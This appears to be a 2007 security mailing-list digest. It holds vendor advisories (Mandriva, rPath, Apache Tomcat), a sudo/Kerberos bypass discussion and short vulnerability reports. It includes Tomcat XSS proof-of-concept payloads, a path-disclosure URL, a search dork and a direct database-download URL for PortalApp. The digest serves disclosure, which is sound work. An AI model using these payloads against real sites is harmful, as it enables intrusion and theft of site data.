Re: Sudo: local root compromise with krb5 enabled
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 On Monday, June 11 at 06:52 PM, quoth Ken Raeburn: But sudo has a curious bug: it *tries* to do the second step, but if that step fails because no local service keys are known, it lets the user become root anyway, because the (potentially fake) Kerberos server said so. For example, on a host without a keytab file: In some MIT applications there was a conscious choice to that effect. The MIT library's interface for verifying credentials has a flag that can be set to indicate whether it should return success or failure for this specific case. (Though personally, I think the default should be the more paranoid one, it would be an incompatible break from previous versions.) Maybe I'm misunderstanding here, but so what? This sounds like the equivalent of this: My program respects the $ALLOW_ROOT_COMPROMISE environment variable. You may think root compromises are bad, and that the environment variable is ludicrous, and I agree (that feature was added before I took over), but if I removed it then that would be an incompatible break from previous versions. Just because older programs allowed it doesn't make it sacrosanct. ~Kyle - -- The Son of man came eating and drinking, and they say, Behold, a glutton and a drunkard, a friend of tax collectors and sinners! Yet wisdom is justified by her deeds. -- Matthew 11:19 -BEGIN PGP SIGNATURE- Comment: Thank you for using encryption! iD8DBQFGcVgnBkIOoMqOI14RAkmTAJ9rcBKhRxGyZSeLRgxMnVsmG0GmEwCfYxY0 ZFXlNYUuE3wadtEWnAVF7Iw= =JdRA -END PGP SIGNATURE-
rPSA-2007-0119-1 spamassassin
rPath Security Advisory: 2007-0119-1 Published: 2007-06-13 Products: rPath Linux 1 Rating: Minor Exposure Level Classification: Indirect User Deterministic Denial of Service Updated Versions: spamassassin=/[EMAIL PROTECTED]:devel//1/3.2.1-0.1-1 References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2873 https://issues.rpath.com/browse/RPL-1450 Description: Previous versions of the spamassassin package are vulnerable to a Denial of Service attack in which a local attacker may overwrite arbitrary files when spamd is run using uncommon configuration options. rPath Linux does not configure spamd using these options and is thus not vulnerable to this attack. Copyright 2007 rPath, Inc. This file is distributed under the terms of the MIT License. A copy is available at http://www.rpath.com/permanent/mit-license.html
Singapore Gallery fullpath disclosure
Reported by Freeprotect.NET member Singapore Gallery is open source code, it is nice and easy to use. It is provided by http://www.sgal.org However it contain an error: http://site.ext/index.php?gallery=./index.php Warning: opendir(/home/user/public_html/galleries/index.php/) [function.opendir]: failed to open dir: Not a directory in /home/user/public_html//includes/singapore.class.php on line 870 Warning: Invalid argument supplied for foreach() in /home/user/public_html/includes/io.class.php on line 129 --
[ MDKSA-2007:123 ] - Updated libwmf packages fix vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDKSA-2007:123 http://www.mandriva.com/security/ ___ Package : libwmf Date: June 13, 2007 Affected: 2007.0, 2007.1, Corporate 3.0, Corporate 4.0 ___ Problem Description: A flaw in libgd2 was found by Xavier Roche where it would not correctly validate PNG callback results. If an application linked against libgd2 was tricked into processing a specially-crafted PNG file, it could cause a denial of service scenario via CPU resource consumption. Libwmf uses an embedded copy of the gd source and may also be affected by this issue. The updated packages have been patched to prevent this issue. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2756 ___ Updated Packages: Mandriva Linux 2007.0: c86673dc09b72cf255a5f9aabd2ae559 2007.0/i586/libwmf-0.2.8.4-6.2mdv2007.0.i586.rpm e3cefcb964c4a757ffbb8ff8339bdc74 2007.0/i586/libwmf0.2_7-0.2.8.4-6.2mdv2007.0.i586.rpm b8fb89d10a40ec19a136f7e214f1589d 2007.0/i586/libwmf0.2_7-devel-0.2.8.4-6.2mdv2007.0.i586.rpm f227ff8694cf40aeb285096dadfc4930 2007.0/SRPMS/libwmf-0.2.8.4-6.2mdv2007.0.src.rpm Mandriva Linux 2007.0/X86_64: 64522c5fbe3ad9a6b8f2e5186c6de79b 2007.0/x86_64/lib64wmf0.2_7-0.2.8.4-6.2mdv2007.0.x86_64.rpm e6089ae8094546d292fb26254a5dc708 2007.0/x86_64/lib64wmf0.2_7-devel-0.2.8.4-6.2mdv2007.0.x86_64.rpm 7ab103ccf86cf95b37ed72cabc345a82 2007.0/x86_64/libwmf-0.2.8.4-6.2mdv2007.0.x86_64.rpm f227ff8694cf40aeb285096dadfc4930 2007.0/SRPMS/libwmf-0.2.8.4-6.2mdv2007.0.src.rpm Mandriva Linux 2007.1: ad2ae717396c13a5b691f99528905f98 2007.1/i586/libwmf-0.2.8.4-12.1mdv2007.1.i586.rpm 5e3e35f2ce695ed9df84296deef64aa1 2007.1/i586/libwmf0.2_7-0.2.8.4-12.1mdv2007.1.i586.rpm 1e668a6e0fd5eb52b5126816501be257 2007.1/i586/libwmf0.2_7-devel-0.2.8.4-12.1mdv2007.1.i586.rpm 0080787c5d105cfd95499c98e4820c6a 2007.1/SRPMS/libwmf-0.2.8.4-12.1mdv2007.1.src.rpm Mandriva Linux 2007.1/X86_64: bc11327efaef5fdb3020e040061fbd7f 2007.1/x86_64/lib64wmf0.2_7-0.2.8.4-12.1mdv2007.1.x86_64.rpm 91c5138f0e731a527505d3a65977ca7d 2007.1/x86_64/lib64wmf0.2_7-devel-0.2.8.4-12.1mdv2007.1.x86_64.rpm ffb53a097a0285a81595a8a8972c520d 2007.1/x86_64/libwmf-0.2.8.4-12.1mdv2007.1.x86_64.rpm 0080787c5d105cfd95499c98e4820c6a 2007.1/SRPMS/libwmf-0.2.8.4-12.1mdv2007.1.src.rpm Corporate 3.0: df34bd3f1bf63ed85b42067761bbec75 corporate/3.0/i586/libwmf-0.2.8-6.5.C30mdk.i586.rpm ab2768da467d4d90766ef8bdacff3bb0 corporate/3.0/i586/libwmf0.2_7-0.2.8-6.5.C30mdk.i586.rpm 7b28d2b7075f95533ad0e500bf731e52 corporate/3.0/i586/libwmf0.2_7-devel-0.2.8-6.5.C30mdk.i586.rpm cb342eb68910afac9faf167928e407a8 corporate/3.0/SRPMS/libwmf-0.2.8-6.5.C30mdk.src.rpm Corporate 3.0/X86_64: 5028c0cb1a0723c865bcd034a3bff5c3 corporate/3.0/x86_64/lib64wmf0.2_7-0.2.8-6.5.C30mdk.x86_64.rpm 7a90b3e4e68e7ac0a5ed6e4a5da34030 corporate/3.0/x86_64/lib64wmf0.2_7-devel-0.2.8-6.5.C30mdk.x86_64.rpm 5e6358404e6abb0acd524c5b2ff5022b corporate/3.0/x86_64/libwmf-0.2.8-6.5.C30mdk.x86_64.rpm cb342eb68910afac9faf167928e407a8 corporate/3.0/SRPMS/libwmf-0.2.8-6.5.C30mdk.src.rpm Corporate 4.0: aa434be3161e2bc7d18dbe182e0245cb corporate/4.0/i586/libwmf-0.2.8.3-6.5.20060mlcs4.i586.rpm 36dd1dc2dd893db122f8d7b24e44e36b corporate/4.0/i586/libwmf0.2_7-0.2.8.3-6.5.20060mlcs4.i586.rpm f10c3894ed2d7627a638a2e057beaac1 corporate/4.0/i586/libwmf0.2_7-devel-0.2.8.3-6.5.20060mlcs4.i586.rpm cdbe755c905cf36ec96639fd0c11481c corporate/4.0/SRPMS/libwmf-0.2.8.3-6.5.20060mlcs4.src.rpm Corporate 4.0/X86_64: 86709521446c865ea2b4bd7b904405c9 corporate/4.0/x86_64/lib64wmf0.2_7-0.2.8.3-6.5.20060mlcs4.x86_64.rpm 43f2632444101c645c1c5fccd9fb65e7 corporate/4.0/x86_64/lib64wmf0.2_7-devel-0.2.8.3-6.5.20060mlcs4.x86_64.rpm 2f1b8932f135fc077352d6178d9dc490 corporate/4.0/x86_64/libwmf-0.2.8.3-6.5.20060mlcs4.x86_64.rpm cdbe755c905cf36ec96639fd0c11481c corporate/4.0/SRPMS/libwmf-0.2.8.3-6.5.20060mlcs4.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact
[ MDKSA-2007:122 ] - Updated gd packages fix vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDKSA-2007:122 http://www.mandriva.com/security/ ___ Package : gd Date: June 13, 2007 Affected: 2007.0, 2007.1, Corporate 3.0, Corporate 4.0 ___ Problem Description: A flaw in libgd2 was found by Xavier Roche where it would not correctly validate PNG callback results. If an application linked against libgd2 was tricked into processing a specially-crafted PNG file, it could cause a denial of service scenario via CPU resource consumption. The updated packages have been patched to prevent this issue. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2756 ___ Updated Packages: Mandriva Linux 2007.0: 4553247ff29b71630a511cfa2e8f8dae 2007.0/i586/gd-utils-2.0.33-5.2mdv2007.0.i586.rpm e597fdc7e70f9d47fba809c068d01c73 2007.0/i586/libgd2-2.0.33-5.2mdv2007.0.i586.rpm 5cb1c7417540c8bf923329a1b913e8af 2007.0/i586/libgd2-devel-2.0.33-5.2mdv2007.0.i586.rpm 41c08511d622f73c2941cd6153283a9d 2007.0/i586/libgd2-static-devel-2.0.33-5.2mdv2007.0.i586.rpm 7f26e734f247f081c4f91d88c4cf8746 2007.0/SRPMS/gd-2.0.33-5.2mdv2007.0.src.rpm Mandriva Linux 2007.0/X86_64: 6d49b3c840e14ed18363069c12c94672 2007.0/x86_64/gd-utils-2.0.33-5.2mdv2007.0.x86_64.rpm 4d96a041fa0afcdb46d395c87f545080 2007.0/x86_64/lib64gd2-2.0.33-5.2mdv2007.0.x86_64.rpm 36921632c56a9972f1d6db49e225e5c7 2007.0/x86_64/lib64gd2-devel-2.0.33-5.2mdv2007.0.x86_64.rpm 8d1636c72f97ea7e654fdae03cdee7ce 2007.0/x86_64/lib64gd2-static-devel-2.0.33-5.2mdv2007.0.x86_64.rpm 7f26e734f247f081c4f91d88c4cf8746 2007.0/SRPMS/gd-2.0.33-5.2mdv2007.0.src.rpm Mandriva Linux 2007.1: be767d1fb70fadda41e824b60a40654a 2007.1/i586/gd-utils-2.0.34-1.1mdv2007.1.i586.rpm d2f160f37beadd9ba3d5170e8524e2cd 2007.1/i586/libgd2-2.0.34-1.1mdv2007.1.i586.rpm 364b5cf24157faf590f19f039f67c041 2007.1/i586/libgd2-devel-2.0.34-1.1mdv2007.1.i586.rpm e87568c973cfae2c65326c95a23841d2 2007.1/i586/libgd2-static-devel-2.0.34-1.1mdv2007.1.i586.rpm 03c9eadb6bdb8ada82180da39b745100 2007.1/SRPMS/gd-2.0.34-1.1mdv2007.1.src.rpm Mandriva Linux 2007.1/X86_64: 39ec275e8946123b78e01671a31ee128 2007.1/x86_64/gd-utils-2.0.34-1.1mdv2007.1.x86_64.rpm 17d51791166f4a15f4cf8fee41852b04 2007.1/x86_64/lib64gd2-2.0.34-1.1mdv2007.1.x86_64.rpm 74195a52b4b4d3de151b720809492aa8 2007.1/x86_64/lib64gd2-devel-2.0.34-1.1mdv2007.1.x86_64.rpm 058ad0e0a91a0d069539b7c235f883a0 2007.1/x86_64/lib64gd2-static-devel-2.0.34-1.1mdv2007.1.x86_64.rpm 03c9eadb6bdb8ada82180da39b745100 2007.1/SRPMS/gd-2.0.34-1.1mdv2007.1.src.rpm Corporate 3.0: 77415362e06982bdf984f378ac768bd1 corporate/3.0/i586/gd-utils-2.0.15-4.4.C30mdk.i586.rpm 28e9d357648fc4367b8ae481a4ef46f0 corporate/3.0/i586/libgd2-2.0.15-4.4.C30mdk.i586.rpm ebcac1bb4ac277b8813d2b9f2d4e6ec9 corporate/3.0/i586/libgd2-devel-2.0.15-4.4.C30mdk.i586.rpm 77376cc5884c131906c6977cb9c52e76 corporate/3.0/i586/libgd2-static-devel-2.0.15-4.4.C30mdk.i586.rpm 19787484527e346d55c74459abcbe878 corporate/3.0/SRPMS/gd-2.0.15-4.4.C30mdk.src.rpm Corporate 3.0/X86_64: beb3b4d6b05b3bf5d5f26be43b166dc0 corporate/3.0/x86_64/gd-utils-2.0.15-4.4.C30mdk.x86_64.rpm 6f24793bb256074012c76cc678caf17f corporate/3.0/x86_64/lib64gd2-2.0.15-4.4.C30mdk.x86_64.rpm d2d43fc0411bbcbdb1c5cd81b5c730fe corporate/3.0/x86_64/lib64gd2-devel-2.0.15-4.4.C30mdk.x86_64.rpm 78891b53940ad4d50010f3a5d8a9eb74 corporate/3.0/x86_64/lib64gd2-static-devel-2.0.15-4.4.C30mdk.x86_64.rpm 19787484527e346d55c74459abcbe878 corporate/3.0/SRPMS/gd-2.0.15-4.4.C30mdk.src.rpm Corporate 4.0: 74461c4ac716814c86060d9418f6cf54 corporate/4.0/i586/gd-utils-2.0.33-3.3.20060mlcs4.i586.rpm 2c6101e648d090bfde2a6038042a56ae corporate/4.0/i586/libgd2-2.0.33-3.3.20060mlcs4.i586.rpm 3beb7a4c7bb978442d3098f852f3e3fc corporate/4.0/i586/libgd2-devel-2.0.33-3.3.20060mlcs4.i586.rpm ef4fb906adf0a9d40fab025ca9cf20d4 corporate/4.0/i586/libgd2-static-devel-2.0.33-3.3.20060mlcs4.i586.rpm febc485fc1fed3d030cf440a20f000ef corporate/4.0/SRPMS/gd-2.0.33-3.3.20060mlcs4.src.rpm Corporate 4.0/X86_64: fc5078a497db8094fbf14980a5ee2c76 corporate/4.0/x86_64/gd-utils-2.0.33-3.3.20060mlcs4.x86_64.rpm 80e1c4bb6338dfb58c246d0a8b001181 corporate/4.0/x86_64/lib64gd2-2.0.33-3.3.20060mlcs4.x86_64.rpm e3db3d95d3a1485226ae15d5bb5ea6c5 corporate/4.0/x86_64/lib64gd2-devel-2.0.33-3.3.20060mlcs4.x86_64.rpm 00a195e5e03a1a5840f95ddd0b42f7db corporate/4.0/x86_64/lib64gd2-static-devel-2.0.33-3.3.20060mlcs4.x86_64.rpm febc485fc1fed3d030cf440a20f000ef
[ MDKSA-2007:124 ] - Updated tetex packages fix vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDKSA-2007:124 http://www.mandriva.com/security/ ___ Package : tetex Date: June 13, 2007 Affected: 2007.0, 2007.1, Corporate 4.0 ___ Problem Description: A flaw in libgd2 was found by Xavier Roche where it would not correctly validate PNG callback results. If an application linked against libgd2 was tricked into processing a specially-crafted PNG file, it could cause a denial of service scenario via CPU resource consumption. Tetex uses an embedded copy of the gd source and may also be affected by this issue. The updated packages have been patched to prevent this issue. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2756 ___ Updated Packages: Mandriva Linux 2007.0: 2e8c2ac6ad83cc072b76787be3d15299 2007.0/i586/jadetex-3.12-116.3mdv2007.0.i586.rpm 957a3160ce764d40e12e6017130a6332 2007.0/i586/tetex-3.0-18.3mdv2007.0.i586.rpm e6f1f57c2aab41833f5a2f4a46356144 2007.0/i586/tetex-afm-3.0-18.3mdv2007.0.i586.rpm 8c6e7772152cfa5ebe14cef82e9c8886 2007.0/i586/tetex-context-3.0-18.3mdv2007.0.i586.rpm 94be356439d6932788d9f7550e9206d5 2007.0/i586/tetex-devel-3.0-18.3mdv2007.0.i586.rpm cd5db61b9bfd3e644efd262de24e84c5 2007.0/i586/tetex-doc-3.0-18.3mdv2007.0.i586.rpm 846e037efab3a20fe81c1be5a5cbbfc0 2007.0/i586/tetex-dvilj-3.0-18.3mdv2007.0.i586.rpm 33c7aa750310bfda386768f9e7f8055d 2007.0/i586/tetex-dvipdfm-3.0-18.3mdv2007.0.i586.rpm 08db04b936e7d91644f21b54a423bcff 2007.0/i586/tetex-dvips-3.0-18.3mdv2007.0.i586.rpm 5bc245e88f789ded24c3b2c36740d24a 2007.0/i586/tetex-latex-3.0-18.3mdv2007.0.i586.rpm bb90c0b9833a35c31450f43149a5b076 2007.0/i586/tetex-mfwin-3.0-18.3mdv2007.0.i586.rpm dba9384f7d839111cacaee7511e080ed 2007.0/i586/tetex-texi2html-3.0-18.3mdv2007.0.i586.rpm 626eb3c0c5f18540e14c25b098e882e5 2007.0/i586/tetex-xdvi-3.0-18.3mdv2007.0.i586.rpm 468a678c98a37047027dc813274004ce 2007.0/i586/xmltex-1.9-64.3mdv2007.0.i586.rpm f65fbde65d9ca68be158f92e24508413 2007.0/SRPMS/tetex-3.0-18.3mdv2007.0.src.rpm Mandriva Linux 2007.0/X86_64: ce0d6de4ce859af079ffe3afc49c05bf 2007.0/x86_64/jadetex-3.12-116.3mdv2007.0.x86_64.rpm 4b2e945b215737269c192a6fbcf838b6 2007.0/x86_64/tetex-3.0-18.3mdv2007.0.x86_64.rpm 1673d2571a84c29b58385e02eb3bd6c3 2007.0/x86_64/tetex-afm-3.0-18.3mdv2007.0.x86_64.rpm 60ca25d92303c6864a50559098c1b601 2007.0/x86_64/tetex-context-3.0-18.3mdv2007.0.x86_64.rpm 91d962afd5f258ab72c5ef2ab6bdfa1a 2007.0/x86_64/tetex-devel-3.0-18.3mdv2007.0.x86_64.rpm 2c186f216f86f43920ad9904d28e3e0f 2007.0/x86_64/tetex-doc-3.0-18.3mdv2007.0.x86_64.rpm 4d6ea1b35f033e1cd27d1d61393a0196 2007.0/x86_64/tetex-dvilj-3.0-18.3mdv2007.0.x86_64.rpm e4fc1eda06c96d9f72ec0415099d6094 2007.0/x86_64/tetex-dvipdfm-3.0-18.3mdv2007.0.x86_64.rpm a4daeeb22f0e9de15893df0d2b49614d 2007.0/x86_64/tetex-dvips-3.0-18.3mdv2007.0.x86_64.rpm 051377331be602aee494c41d7858b8a8 2007.0/x86_64/tetex-latex-3.0-18.3mdv2007.0.x86_64.rpm e341788602e2239080c80c111bc23d52 2007.0/x86_64/tetex-mfwin-3.0-18.3mdv2007.0.x86_64.rpm 6486e09c3be46503b597666819f2dcb3 2007.0/x86_64/tetex-texi2html-3.0-18.3mdv2007.0.x86_64.rpm fe18bf6f511d0a8af4a52f8970102fcb 2007.0/x86_64/tetex-xdvi-3.0-18.3mdv2007.0.x86_64.rpm 9b018058b8cae68e65228a151a849603 2007.0/x86_64/xmltex-1.9-64.3mdv2007.0.x86_64.rpm f65fbde65d9ca68be158f92e24508413 2007.0/SRPMS/tetex-3.0-18.3mdv2007.0.src.rpm Mandriva Linux 2007.1: 50048a669bb05f151efa42105f43fb9c 2007.1/i586/jadetex-3.12-129.2mdv2007.1.i586.rpm e29de9eb213eb8b94539a1e3d6a22db9 2007.1/i586/tetex-3.0-31.2mdv2007.1.i586.rpm 81ca9f7536b997c3793df222442fb519 2007.1/i586/tetex-afm-3.0-31.2mdv2007.1.i586.rpm 9659b9e7a5b8530c49cc9ceb40a32f18 2007.1/i586/tetex-context-3.0-31.2mdv2007.1.i586.rpm 2ba7ea077768d4c82351656578c984eb 2007.1/i586/tetex-devel-3.0-31.2mdv2007.1.i586.rpm 6ea801e052eab5a1bd6258c08b6c8268 2007.1/i586/tetex-doc-3.0-31.2mdv2007.1.i586.rpm 16160a0300b7a80c131a161fee536ccb 2007.1/i586/tetex-dvilj-3.0-31.2mdv2007.1.i586.rpm 8fb693d4715e914d85d4ef97f57c91f8 2007.1/i586/tetex-dvipdfm-3.0-31.2mdv2007.1.i586.rpm bc1ad2d54861f6b447e6205024f7e52f 2007.1/i586/tetex-dvips-3.0-31.2mdv2007.1.i586.rpm f672d69f2edb5d6a9d1ef562f570a7b9 2007.1/i586/tetex-latex-3.0-31.2mdv2007.1.i586.rpm 028c8012150d66f65b0386f1c1bc85a4 2007.1/i586/tetex-mfwin-3.0-31.2mdv2007.1.i586.rpm 67aa7bdf0e24c48f005ffdb6d5f1ed36 2007.1/i586/tetex-texi2html-3.0-31.2mdv2007.1.i586.rpm 0f2a7b4946894afa7e126f9deb17a7b7
[CVE-2007-2450]: Apache Tomcat XSS vulnerability in Manager
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 CVE-2007-2450: Apache Tomcat XSS vulnerabilities in Manager Severity: low (cross-site scripting) Vendor: The Apache Software Foundation Versions Affected: Tomcat 4.0.0 to 4.0.6 Tomcat 4.1.0 to 4.1.36 Tomcat 5.0.0 to 5.0.30 Tomcat 5.5.0 to 5.5.24 Tomcat 6.0.0 to 6.0.13 Description: The Manager and Host Manager web applications do not escape some user provided data before including it in the output. This enables a XSS attack. The user must be logged in to the Manager or Host Manager web application. Mitigation: 1. Log out of the Manager or Host Manager application (close the browser) once tasks requiring use of the manager have been completed. Example: form action=http://example.com:8080/manager/html/upload; method=post enctype=multipart/form-data INPUT TYPE=hidden NAME='deployWar;filename=scriptalert()/script Content-Type: image/gif' VALUE=abc input type=submit /form Credit: These issues were discovered by Daiki Fukumori, Secure Sky Technology. References: http://tomcat.apache.org/security.html Mark Thomas -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.7 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFGcKdkb7IeiTPGAkMRAt1IAKCR47H3juKSvEdGwymOMCpKZdXi8wCgvrzl aQy4/FihDqtrwRDLl0f/asA= =RGcQ -END PGP SIGNATURE-
[ MDKSA-2007:121 ] - Updated freetype2 packages fix integer overflow vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDKSA-2007:121 http://www.mandriva.com/security/ ___ Package : freetype2 Date: June 13, 2007 Affected: 2007.0, 2007.1, Corporate 3.0, Corporate 4.0, Multi Network Firewall 2.0 ___ Problem Description: An integer overflow vulnerability was discovered in the way the FreeType font engine processed TTF files. If a user were to load a special font file with a program linked against freetype, it could cause the application to crash or possibly execute arbitrary code as the user running the program. The updated packages have been patched to prevent this issue. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2754 ___ Updated Packages: Mandriva Linux 2007.0: 888adc26eb66e993d1c8256ebf72287e 2007.0/i586/libfreetype6-2.2.1-4.2mdv2007.0.i586.rpm b10ff58273af4bfbf05bd1d6fabe5da8 2007.0/i586/libfreetype6-devel-2.2.1-4.2mdv2007.0.i586.rpm 84d7e5982cd6c7bb7b10e0960a943474 2007.0/i586/libfreetype6-static-devel-2.2.1-4.2mdv2007.0.i586.rpm fbf5f1732c13a6f54f3e0214b48552c1 2007.0/SRPMS/freetype2-2.2.1-4.2mdv2007.0.src.rpm Mandriva Linux 2007.0/X86_64: a93fb30f5a597fa89fc8cd85286b53ce 2007.0/x86_64/lib64freetype6-2.2.1-4.2mdv2007.0.x86_64.rpm 406806d503f5d355c8e77b989baf1f42 2007.0/x86_64/lib64freetype6-devel-2.2.1-4.2mdv2007.0.x86_64.rpm f86a4e7e99da26c14d673c02cd4d4ba8 2007.0/x86_64/lib64freetype6-static-devel-2.2.1-4.2mdv2007.0.x86_64.rpm fbf5f1732c13a6f54f3e0214b48552c1 2007.0/SRPMS/freetype2-2.2.1-4.2mdv2007.0.src.rpm Mandriva Linux 2007.1: 6bafde7e6f952a0492765d461da32c97 2007.1/i586/libfreetype6-2.3.1-3.2mdv2007.1.i586.rpm f34186eb65e04d416413cff4df8f9613 2007.1/i586/libfreetype6-devel-2.3.1-3.2mdv2007.1.i586.rpm c111b1522e7825cc6ddf05b60e171aae 2007.1/i586/libfreetype6-static-devel-2.3.1-3.2mdv2007.1.i586.rpm 47d7d53f3e9b9b302b7398b46200e3bb 2007.1/SRPMS/freetype2-2.3.1-3.2mdv2007.1.src.rpm Mandriva Linux 2007.1/X86_64: baa54ceaf4ba1525299cf6b0e859f933 2007.1/x86_64/lib64freetype6-2.3.1-3.2mdv2007.1.x86_64.rpm ff16e366025be280a20e3d39ff0943d7 2007.1/x86_64/lib64freetype6-devel-2.3.1-3.2mdv2007.1.x86_64.rpm 7db139854e18a1d7f20438068bb22761 2007.1/x86_64/lib64freetype6-static-devel-2.3.1-3.2mdv2007.1.x86_64.rpm 47d7d53f3e9b9b302b7398b46200e3bb 2007.1/SRPMS/freetype2-2.3.1-3.2mdv2007.1.src.rpm Corporate 3.0: 6a5823f891bb8dd9b34af5c194697151 corporate/3.0/i586/libfreetype6-2.1.7-4.5.C30mdk.i586.rpm 92a49443058dc76734007f42ea6ce992 corporate/3.0/i586/libfreetype6-devel-2.1.7-4.5.C30mdk.i586.rpm ad0d74f4a3415f7ff808b1d50c6deda6 corporate/3.0/i586/libfreetype6-static-devel-2.1.7-4.5.C30mdk.i586.rpm b13be6aab56c9c23f32e3da292d424c1 corporate/3.0/SRPMS/freetype2-2.1.7-4.5.C30mdk.src.rpm Corporate 3.0/X86_64: 6a5823f891bb8dd9b34af5c194697151 corporate/3.0/x86_64/libfreetype6-2.1.7-4.5.C30mdk.i586.rpm ae6a04d285558d7d58e82e40ac82d5f2 corporate/3.0/x86_64/lib64freetype6-2.1.7-4.5.C30mdk.x86_64.rpm f03df050feb6e8ec2abe9c30e4386423 corporate/3.0/x86_64/lib64freetype6-devel-2.1.7-4.5.C30mdk.x86_64.rpm 40af8e12d5651ce2ee05c166e6d9f180 corporate/3.0/x86_64/lib64freetype6-static-devel-2.1.7-4.5.C30mdk.x86_64.rpm b13be6aab56c9c23f32e3da292d424c1 corporate/3.0/SRPMS/freetype2-2.1.7-4.5.C30mdk.src.rpm Corporate 4.0: 554afdf7c745ba4476df5860a25b05d4 corporate/4.0/i586/libfreetype6-2.1.10-9.6.20060mlcs4.i586.rpm 3b80645d0a25c3871268c7e2d0a378ac corporate/4.0/i586/libfreetype6-devel-2.1.10-9.6.20060mlcs4.i586.rpm 8017f06d616c226f00e8476f8583973f corporate/4.0/i586/libfreetype6-static-devel-2.1.10-9.6.20060mlcs4.i586.rpm 0e75c0ceca12cc7eeb93a32cb415effa corporate/4.0/SRPMS/freetype2-2.1.10-9.6.20060mlcs4.src.rpm Corporate 4.0/X86_64: 554afdf7c745ba4476df5860a25b05d4 corporate/4.0/x86_64/libfreetype6-2.1.10-9.6.20060mlcs4.i586.rpm 3b80645d0a25c3871268c7e2d0a378ac corporate/4.0/x86_64/libfreetype6-devel-2.1.10-9.6.20060mlcs4.i586.rpm 8017f06d616c226f00e8476f8583973f corporate/4.0/x86_64/libfreetype6-static-devel-2.1.10-9.6.20060mlcs4.i586.rpm a8c75240e1c74eeddbb96b034157ce48 corporate/4.0/x86_64/lib64freetype6-2.1.10-9.6.20060mlcs4.x86_64.rpm 4ca744991bfb4260f45c9d2c48610287 corporate/4.0/x86_64/lib64freetype6-devel-2.1.10-9.6.20060mlcs4.x86_64.rpm 79ad754685d97d2f58ddcc5ed218955c corporate/4.0/x86_64/lib64freetype6-static-devel-2.1.10-9.6.20060mlcs4.x86_64.rpm 0e75c0ceca12cc7eeb93a32cb415effa corporate/4.0/SRPMS/freetype2-2.1.10-9.6.20060mlcs4.src.rpm Multi Network Firewall 2.0:
[CVE-2007-2449] Apache Tomcat XSS vulnerabilities in the JSP examples
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 CVE-2007-2449: Apache Tomcat XSS vulnerabilities in the JSP examples Severity: low (cross-site scripting) Vendor: The Apache Software Foundation Versions Affected: Tomcat 4.0.0 to 4.0.6 Tomcat 4.1.0 to 4.1.36 Tomcat 5.0.0 to 5.0.30 Tomcat 5.5.0 to 5.5.24 Tomcat 6.0.0 to 6.0.13 Description: The JSP examples web application displays does not escape some user provided data before including it in the output. This enables a XSS attack. Mitigation: 1. Undeploy the examples web application(s). Example: http://host:port/jsp-examples/snp/snoop.jsp;scriptalert()/scripttest.jsp Credit: These issues were discovered by an unknown security researcher and reported to JPCERT. References: http://tomcat.apache.org/security.html Mark Thomas -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.7 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFGcKbJb7IeiTPGAkMRAi9BAKDsuoomGh2n9BYl7mT/tGEjQ+HIlQCdHjnU zdreMwViLR/bDBnys5YkhPk= =SK7+ -END PGP SIGNATURE-
Elxis CMS = 2006.4 - banner module - sql injection
Elxis Content Management System Banner Mod SQL InjectionJun 14 2007 --- * Product Elxis Content Management System * Vulnerable Versions All versions to 2006.4 of the Elxis CMS. * Vendor Status The Vendor was notified and the issue fixed. A patch can be found at: http://www.elxis.org/index.php?option=com_mtreetask=viewlinklink_id=98Itemid=140 * Details The banner module of the Elxis Content Management System is vulnerable to an SQL injection. The module keeps track of already displayed banners and stores their ID's in a cookie named `mb_tracker'. The cookie value is then used in an SQL query to get the next, not yet shown banner. * Impact By modifying the cookie value, an attacker might be able to execute SQL queries. * Exploit No exploit required. --- Copyright (C) Nico Leidecker 2007 [EMAIL PROTECTED]. Permission is hereby granted for the electronic redistribution of this informa- tion. It is not to be edited or altered in any way without the express written consent of the author. The information herein contained may change without notice. Use of this infor- mation constitutes acceptance for use in an AS IS condition. There are NO war- ranties, implied or otherwise, with regard to this information of its use. Any use of this information is at the user's risk. In no event shall the au- thor/distributor be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information. __ Erweitern Sie FreeMail zu einem noch leistungsstärkeren E-Mail-Postfach! Mehr Infos unter http://produkte.web.de/club/?mc=021131
Re: RedLevel Advisory #23 - SalesCart Shopping Cart SQL Injection Vulnerability
This is not true and is actually slander. He says no one responded; however, I personally talked with Mr. Martinelli and explained to him he was looking at an old out-of-date demo on the website that is not indicative of the released product. These tests were performed on a non-commercial product demo and are not indicative of the commercial product at all. We were able to reproduce this sql injection on this demo code but not on the released product. In addition, the product the customer is referring to is also completely obsolete. Mr. Martinelli's information is incorrect and down right slanderous in at least 3 or 4 accounts.
ByPass In PortalApp
Found By: Hasadya Raed Contact : [EMAIL PROTECTED] Greetz : Guardian Information Systems --- Script :PortalApp ==bypass Download :www.portalapp.net Dork:Copyright @2007 Iatek LLC or powered by PortalApp orCopyright @2007 Iatek LLC powered by PortalApp --- Exploit: http://www.Victim.Com/path/data/8691.mdb
RFI In Script SH-News 3.1
